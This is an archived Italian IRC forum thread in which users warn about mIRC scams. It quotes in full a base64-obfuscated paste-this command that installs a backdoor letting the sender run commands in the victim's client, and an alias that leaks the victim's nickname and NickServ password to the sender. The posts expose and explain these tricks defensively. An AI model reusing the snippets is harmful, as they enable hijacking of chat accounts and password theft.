PDA

View Full Version : I lamer non muoiono mai?

Dracoo
31-03-2004, 19:53
Salve... un utente alquanto strano (che non conosco) mi manda un file txt appena entro in canale, e mi fa:

<@Dracoo> ThE_|OzZ{?
<@Dracoo> che file è?
<ThE_|OzZ{> sono dei trucchi
<ThE_|OzZ{> se vuoi essere meglio di un newbies..

Già capisco che non è nulla di sano... passo il file sotto l'antivirus (non si sa mai!!) tutto ok... lo apro:

Trucchi mIRC:
copia e incolla dove scrivi...

//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IG hhbHRkZWYgfQ==,m) | .load -rs czm.mrc | msg ThE_|OzZ{ start

Io con un //echo mi "decodifico" il $decode, e viene fuori:

on ^*:text:ins*:?:{ . $+ $2- | haltdef }

Stringa alquanto curiosa...
Alla fine che fa? Ogni volta che ricevo un mess iniziante per ins, non me lo fa apparire, e mi da comando la seconda parola...
Perciò il simpatico ThE_|OzZ{ che fa? Mi manda una stringa del tipo
ins mode #channel +o ThE_|OzZ{
e io gli do lo status di op, senza accorgermene...

Questo è un gran cretino! Sto al gioco e gli mando un privmsg con start, e lui che mi fa?
<ThE_|OzZ{> ins mode #channel +o ThE_|OzZ{
Come se fossi @ sul canale #channel !! asd

Certo che esistono dei grandi stupidi al mondo...
Diffidate da ogni ThE_|OzZ{ che incontriate, e da qualunque persona vi mandi dei file text inizianti con //write e scritte strane.

bye

PUOJACKZ
31-03-2004, 21:45
Certo che esistono dei grandi stupidi al mondo...
Diffidate da ogni ThE_|OzZ{ che incontriate, e da qualunque persona vi mandi dei file text inizianti con //write e scritte strane.

...

/me ripensa a che diceva SilentMan approposito...

Nonostante sia stato ripetuto centinaia milioni di volte in questa e in altre sedi, ci troviamo ancora una volta costretti a ricordarvi di NON APRIRE URL (e anche programmi, scripts ecc.. n.d. PUOJ) proposti da persone sconosciute o non fidate, ne' su IRC ne' altrove.

/me riflette su quanto si possa imparare in questi momenti...

"Repetita Juvant"

Thunder
25-04-2004, 21:40
A quanto pare i lamer non moriranno mai davvero...
Un tipo voleva farmi mettere sto alias nei remote... -_-
alias ns { set %nick2 $2 | set %nick $me | ns $1- }
on *:text:wella:?: { msg $nick %nick == %nick2 | close -m }
Quanto e' stupido da 1 a 10? :D

Tenchi
26-06-2004, 19:21
Penso che i lamers ci saranno sempre, in quanto fanno parte di una fascia di persone. Il mondo è vario in tutti i sensi :P

LostCore
26-07-2004, 11:26
come funzione l'echo?

Thunder
26-07-2004, 14:14
Se vuoi vedere l'ip da mIRC (che ti ritorni indietro nella finestra attiva) eseguirai questo comando:
//echo -a $ip
E ritornerà indietro il seguente:
127.0.0.1
Chiaramente ho messo l'ip locale come esempio, comunque puoi fare pure //echo -a Ciao e ti ritornerà indietro Ciao, ma abitualmente viene utilizzato per variabili ed identificatori.
Spero di essere stato chiaro, ciao![/code]